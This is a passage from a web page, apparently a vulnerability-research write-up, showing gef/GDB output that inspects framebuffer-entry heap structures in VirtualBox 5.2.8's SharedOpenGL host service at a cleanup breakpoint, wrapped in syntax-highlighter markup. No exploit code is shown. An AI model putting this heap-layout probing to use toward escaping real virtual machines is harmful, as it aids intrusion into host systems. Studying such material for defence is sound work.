(CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4d00  $40 = &#8220;H3DORInstance:&#8221;  0x7fb79cc729f0:\t0x00007fb79d130250\t0x00007fb79d06dd40  0x7fb79cc72a00:\t0x0000000000000000\t0x0000029b00000556  0x7fb79cc72a10:\t0x0000000000010101  $41 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4dc0  $42 = &#8220;H3DORInstance:&#8221;  0x7fb79cc81690:\t0x00007fb79cc729e0\t0x00007fb79e1d7c50  0x7fb79cc816a0:\t0x0000000000000000\t0x0000029b00000556  0x7fb79cc816b0:\t0x0000000000010101  $43 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4f40  $44 = &#8220;H3DORInstance:&#8221;  0x7fb79d66a310:\t0x00007fb79cc81680\t0x00007fb79cc81390  0x7fb79d66a320:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d66a330:\t0x0000000000010101  $45 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4c40  $46 = &#8220;H3DORInstance:&#8221;  0x7fb79cc67450:\t0x0000000000000000\t0x00007fb79cc7ba00  0x7fb79cc67460:\t0x0000000000000000\t0x0000029b00000556  0x7fb79cc67470:\t0x0003506100010101  $47 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4b80  $48 = &#8220;H3DORInstance:&#8221;  0x7fb79d12dc50:\t0x00007fb79d66a300\t0x00007fb79d12f080  0x7fb79d12dc60:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d12dc70:\t0x0000000000010101  $49 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4a00  $50 = &#8220;H3DORInstance:&#8221;  0x7fb79d66a2b0:\t0x00007fb79cc67440\t0x00007fb79d12f330  0x7fb79d66a2c0:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d66a2d0:\t0x0003506f00010101  $51 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4940  $52 = &#8220;H3DORInstance:&#8221;  0x7fb79cf983c0:\t0x00007fb79d12dc40\t0x00007fb79cc81400  0x7fb79cf983d0:\t0x0000000000000000\t0x0000029b00000556  0x7fb79cf983e0:\t0x0000000000010101  $53 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4ac0  $54 = &#8220;H3DORInstance:&#8221;  0x7fb79d0a7430:\t0x00007fb79cf983b0\t0x00007fb79cc814f0  0x7fb79d0a7440:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d0a7450:\t0x0000000000010101<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f514775088597-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f514775088597-63\">63<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-1\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-2\"><span class=\"crayon-v\">Continuing<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-3\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-i\">Thread<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb791e05700<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">LWP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3722<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">exited<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-4\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-i\">Thread<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb793fff700<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">LWP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3723<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">exited<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-6\"><span class=\"crayon-i\">Thread<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">43<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;VDMA&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hit <\/span><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CrFbDisplayBase<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">fbCleanupRemoveAllEntries<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x7fb79d69aec0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">5.2.8<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">HostServices<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SharedOpenGL<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">crserverlib<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">presenter<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">display_base<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cpp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">320<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-7\"><span class=\"crayon-cn\">320<\/span><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pEntry<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CrVrScrCompositorConstIterNext<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">Iter<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-8\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">pl<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-9\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4e80<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-10\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">29<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4d00<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-11\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">30<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4dc0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-12\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">31<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4f40<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-13\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4c40<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-14\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">33<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4b80<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-15\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">34<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4a00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-16\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">35<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4940<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-17\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">36<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4ac0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-18\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">pli<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-19\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">37<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4e80<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-20\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">38<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-21\"><span class=\"crayon-cn\">0x7fb79d130260<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc81460<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc71ef0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-22\"><span class=\"crayon-cn\">0x7fb79d130270<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-23\"><span class=\"crayon-cn\">0x7fb79d130280<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-24\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">39<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4d00<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-25\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">40<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-26\"><span class=\"crayon-cn\">0x7fb79cc729f0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d130250<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d06dd40<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-27\"><span class=\"crayon-cn\">0x7fb79cc72a00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-28\"><span class=\"crayon-cn\">0x7fb79cc72a10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-29\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4dc0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-30\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">42<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-31\"><span class=\"crayon-cn\">0x7fb79cc81690<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc729e0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79e1d7c50<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-32\"><span class=\"crayon-cn\">0x7fb79cc816a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-33\"><span class=\"crayon-cn\">0x7fb79cc816b0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-34\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">43<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4f40<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-35\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">44<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-36\"><span class=\"crayon-cn\">0x7fb79d66a310<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc81680<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc81390<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-37\"><span class=\"crayon-cn\">0x7fb79d66a320<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-38\"><span class=\"crayon-cn\">0x7fb79d66a330<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-39\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">45<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4c40<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-40\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">46<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-41\"><span class=\"crayon-cn\">0x7fb79cc67450<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc7ba00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-42\"><span class=\"crayon-cn\">0x7fb79cc67460<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-43\"><span class=\"crayon-cn\">0x7fb79cc67470<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0003506100010101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-44\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">47<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4b80<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-45\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 